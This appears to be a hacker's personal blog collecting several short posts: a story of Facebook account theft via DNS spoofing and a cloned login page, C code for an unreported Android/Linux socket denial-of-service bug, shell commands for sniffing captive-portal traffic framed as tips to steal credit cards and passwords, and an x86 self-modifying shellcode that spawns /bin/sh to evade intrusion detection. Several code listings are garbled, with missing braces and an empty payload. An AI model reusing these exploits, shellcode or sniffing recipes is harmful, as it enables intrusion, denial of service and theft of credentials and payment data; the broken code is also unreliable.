How to lose your Facebook account in some steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But, how the incredible, invencible, fabulous vendetta could be hacked?…

Well it was easy… actually very easy…

I was happy seeing a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were at the same IP range.

She used Ettercap to perform a DNS spoofing to, pointing to her computer, and in her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPN’s to work, so it’s normal to me be disconnected from my accounts. I entered to the Facebook’s messenger, entered my credentials and… pwned!


And that’s all… you don’t fall me very well que we say!

Ping DoS on Linux (Android)

Yep… it sounds weird, maybe it sounds stupid coff.. coff.. and I know, it’s sooooo unuseful… but… well the story is this:

On saturday I went with a friend to hum… well not to walk because I live in a hell’s extension.. around 40º C so is not possible to walk but to go to some places and I tried to explain her what is the difference between hacking (pentesting, attacks to Facebook, Whatsapp interception, etc) and real hacking (mostly vuln-dev)… she started to laugh when I compared the hacking with art… and I told that yes, sometimes as you can start to write, to paint or do whatever you want to do to feel better, you can start to look for bugs… and it’s relaxing and amusing… so I showed her how to find a bug on hers phone.. and here is the result.

I’m not very sure if it is reported to Android or to the Kernel Linux project.. but I don’t want to have any thing to see with Google or with Linus Torvals… so I prefer just publish here the bug.. and in the other hand I a bad guy… so I don’t report bugs anymore.

Oh yeap… she was not convinced about hacking is like art and she told me that I’m friki because I like this kind of estrange things D: … I’m not a friki D:


#include <sys/socket.h>
#include <arpa/inet.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};

void fuzz(void * param){
addr.sin_family = 0;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
int main(int argc, char **argv)
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
addr.sin_family = 0x1a;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
return 0;

Without /etc/shadow

char tlayula[] =
(*(void(*) ()) tlayula)();

The life is cruel… and I’m worst B\

Attacking captive portals

I live near to USA, and there is so common the use of captive portals for everything, basically if you go to the bathroom you’ll find a captive portal to use the internet while you.. psss… the thing you do at the bathroom.

The captive portals are amazing places to steal juicy information like credit cards, passwords, credit cards, chats, credit cards, hashes, tokens and.. ah yeah!, credit cards.

Here my tips:

# airmon-ng start wlan0 [chanel]

# tshark -i wlanmon0 -Y "http.request.method == "GET"" || tshark -i wlanmon0 -Y "http.request.method == "POST"" | tee -a get3.

(Oh!.. this can redirect also de encrypted traffic)

# grep *.cgi *.pcap | while read line; do NOMBRE=$(echo $line | awk -F "PSM_LAST_NAME"={'print $2'} | cut -d' ' -f1) CUARTO= =$(echo $line | awk -F "ROOM_NO"={'print $2'} | cut -d' ' -f1)

(Also you can create a BASH script for the past line if you’re using a Pineapple).


Be careful, most part of the captive portals are protected by a SOC or at least an IDS… so… chill out 😉

Talk: wget /wp-admin/

Tomorrow I’ll be offering a talk for the Universidad Tres Culturas, on 10 am at Mexico City for the “Primer congreso internacional de sistemas computacionales”.

I’ll talk about how I detected a botnet attacking a lot of hosts around the world. A little basic, because is a talk for students, but I think you’ll get a lot of ideas about how to attack large network ranges, and how the bad guys are doing it.

Linux/x86 IDS evasion shellcode

When I was young I learned from Sergio Alvarez (Shadow), maybe the most skilled shellcoder from Argentina, a lot of the most weird, strange and amazing shellcoding techniques. Shadow is simply awesome..

This is a PoC of shellcode I developed using his technique to self-modifying opcodes to a multipurpose, in this case is to avoid an IDS… yes I know, maybe you can’t believe me, but just try!.. it’s an old shellcode but is one of the most advanced techniques in the world 😉

char rockaleta[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41";
int main ()
printf("Length: %d bytes\n", strlen(rockaleta));
int (*sc)() = (int (*)())rockaleta;
return 0;